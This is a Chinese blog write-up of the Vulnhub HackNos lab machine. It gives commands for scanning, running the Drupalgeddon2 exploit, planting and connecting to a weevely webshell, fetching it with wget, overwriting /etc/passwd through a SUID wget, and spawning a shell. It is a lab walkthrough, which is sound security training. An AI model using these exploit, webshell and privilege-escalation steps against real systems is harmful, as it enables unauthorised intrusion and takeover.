Vulnhub-HackNos-Writeup

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

靶机网址:

https://drive.google.com/open?id=1IOpXibf-A9iSwoG4IW8HdXFvDBFoy7N1

靶机知识点:

  • nmap
  • weevely
  • passwd
  • openssl
  • wget
  • python

靶机ip:192.168.34.152
kali:192.168.34.80

信息收集

nmap -sV -p 0-65535 192.168.34.152

在这里插入图片描述
看见这两个就知道是web了

dirb http://192.168.34.152

扫个目录看看

在这里插入图片描述

东西还不少,我看了一下,drupal框架。

在这里插入图片描述

whatweb 192.168.34.152/drupal

在这里插入图片描述

漏洞利用

百度了一下drupal 7的漏洞
下载个工具

git clone https://github.com/dreadlocked/Drupalgeddon2.git

进入目录,直接运行。

./drupalgeddon2.rb http://192.168.34.152/drupal

在这里插入图片描述

想写个小马,发现不能写。

在这里插入图片描述

使用weevely生成个小马

weevely generate cmd ./xiaoma.php

在这里插入图片描述
使用python搭建简易服务器,然后通过wget下载。
在这里插入图片描述
连接小马

weevely http://192.168.34.152/drupal/xiaoma.php cmd

在这里插入图片描述

权限提升

在/var/www/html下发现了一个文件
在这里插入图片描述
base64编码

echo KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA== | base64 -d

在这里插入图片描述

解码后是brainfuck,再次解码
https://www.splitbrain.org/services/ook

在这里插入图片描述

得到账号密码,ssh登录不上,python也反弹不tty。
在这里插入图片描述
在这里插入图片描述

看看有没有什么权限

audit_suidsgid -only-suid /

在这里插入图片描述

有wget。准备覆写靶机的/etc/passwd文件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

使用msf,反弹

打开msfconsole。

在这里插入图片描述

python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

在这里插入图片描述

欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bog0n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值